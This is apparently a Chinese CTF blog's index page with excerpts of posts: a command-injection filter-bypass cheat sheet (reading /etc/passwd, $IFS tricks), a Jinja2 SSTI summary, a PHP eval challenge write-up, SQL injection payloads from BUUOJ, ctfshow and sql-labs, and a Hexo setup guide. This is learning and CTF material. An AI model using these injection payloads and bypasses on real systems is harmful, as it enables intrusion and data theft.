Rossweisse

命令注入知识点总结过滤空格123451、%20(space)、%09(tab)、$IFS$9、 IFS、IFS2、使用<或者<>来绕过空格 cat<a.txt3、花括号扩展{OS_COMMAND,ARGUMENT} {cat,/etc/passwd}4、$IFS 空格绕过 cat$IFSa.txt5、变量控制 X=$'cat\x09./flag.php 过滤关键字1234567891011121314151、使用空变量 使用$*和$@，$x(x 代表 1-9),${x}(x>=10)(我尝试小于 10 也是可以的) 因为在没有传参的情况下，上面的特殊变量都是为空的 ca${21}t a.txt2、反斜杠 ca\t a.txt3、变量替换 a=ca;b=t;c=a.txt;a aab $c4、引号 c'a't flag.php5、编码绕过 Base64 编码绕过： root@kali:~/# echo 'cat a.txt&#x ...

模板注入(SSTI)的简单总结前言由于现在还是萌新时期，这时候决定先写一篇关于模板注入的简单总结给自己用。 SSTI的简单测试 各框架的模板结构 jinja20x01在缺省情况下，以下全局变量可以在 Jinja2 模板中使用： config 当前配置对象（ flask.config ）tips：这个变量总是可用，甚至是在被导入的模板中。 request 当前请求对象（ flask.request ）。 在没有活动请求环境情况下渲染模板时，这个变量不可用。 session 当前会话对象（ flask.session ）。 在没有活动请求环境情况下渲染模板时，这个变量不可用。 g 请求绑定的全局变量（ flask.g）。 在没有活动请求环境情况下渲染模板时，这个变量不可用。 url_for() flask.url_for()函数。 get_flashed_messages() flask.get_flashed_messages() 函数。 0x02在python的SSTI中，大部分是依靠基类->子类->危险函数的方式来利用ssti。 __class__ 万 ...

前言 对于本萌新来说，这次的nep比赛是非常好的一次历练机会（虽然web一道都没有写出来QAQ，但是之后复现后学到了很多新的姿势，相对来说还是有点提升的，嘿嘿。 Weblittle_trick打开题目后发现一串代码 1234567891011<?php error_reporting(0); highlight_file(__FILE__); $nep = $_GET['nep']; $len = $_GET['len']; if(intval($len)<8 && strlen($nep)<13){ eval(substr($nep,0,$len)); }else{ die('too long!'); }?> 算是第一次遇到trick题吧，找了找度娘知道可以利用php的反引号执行系统命令 的特性 第一种解法tips：这个解法需要开两次靶机，第一次查看文件目录，第二次cat 1u ...

BUUOJ-Web WriteUp [极客大挑战 2019]EasySQL简单的sql注入 这里是payload 11' or 1=1 # 可以登陆进去之后直接看到flag flag{2c793226-369d-4941-af62-10463af21b6c} [强网杯 2019]随便注尝试了各种姿势后发现可以用堆叠注入 爆库名 1’;show databases;# 爆表名 1’;show tables;# 爆列名 121';show columns from `1919810931114514`;# #爆1919810931114514表1';show columns from `words`;# #爆words表 发现id在words表中，那么咱只需要改个表名就行了 1231';rename table `words` to `words1`; # 把表words更名为words1rename tables `1919810931114514` ...

ctfshow SQL刷一刷ctfshow的sql题，提升一下sql方面的缺陷 web171进入后题目给出了sql注入的语句 1select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1; 构造一下payload 1234561' order by 4 %23 # 查询列数-1' union select 1,2,3 %23 # 查回显点-1' union select 1,database(),3 %23 # 爆库名-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3 %23 # 爆表名-1' union select 1,(select grou ...

sql-labs-less-1-10 Less-1-基于’ 的字符型注入进去后老套路 先测试一下注入点 id=1’ and 1=1 –+ 把1=1换成1=2 id=1‘ and 1=2 –+ 发现没有报错，也没有显示错误信息，说明可以使用 ‘ 字符注入 查询有多少列 id=1’ order by 4 –+ 出现错误，证明表中只有三列 判断显示点 id=-1’ union select 1,2,3 –+ 查询用户，数据库 id=-1’ union select 1,user(),database() –+ 查询用户名，密码 id=-1’ union select 1,(select group_concat(concat_ws(‘—‘,username,password)) from users),3 –+ Less-2-数字型注入由提示知道是整数型注入 老套路 id=1 and 1=1 –+ 吧1=1换成1=2 id=1 and 1=2 –+ 没有错误，也没有回显，说明为数字型注入 查询有多少列 id=1 order by 4 – ...

搭建步骤 环境搭建 安装node.js 安装git 安装Hexo github仓库的创建 githubSSH的配置 sublime的安装使用 Hexo与github连接 Hexo的主题切换 环境搭建安装node.js 安装node.js之前请先安装npm并了解相关知识 Hexo基于node.js,所以我们需要现在计算机中安装node.js.选择windows64位安装包下载，下载完后一路next就好啦。 检查node.js是否安装成功，win+r打开命令窗口，输入node -v出现版本号即安装成功 检查npm是否安装成功，在命令窗口下，输入npm -v出现版本号即安装成功 好啦，到这里Hexo的环境已经搭建完毕了 安装git1、git下载git的下载可以去官网下载https://www.git-scm.com/download，但是会有点慢。觉得慢的可以去这个网址下载链接：https://pan.baidu.com/s/1_nBfUmuRlilFQnVeoYALiw 提取码：qivu 2、git安装1、下载完后双击安装程序Git-2.30.0-64-bit，进入安装界面，点击n ...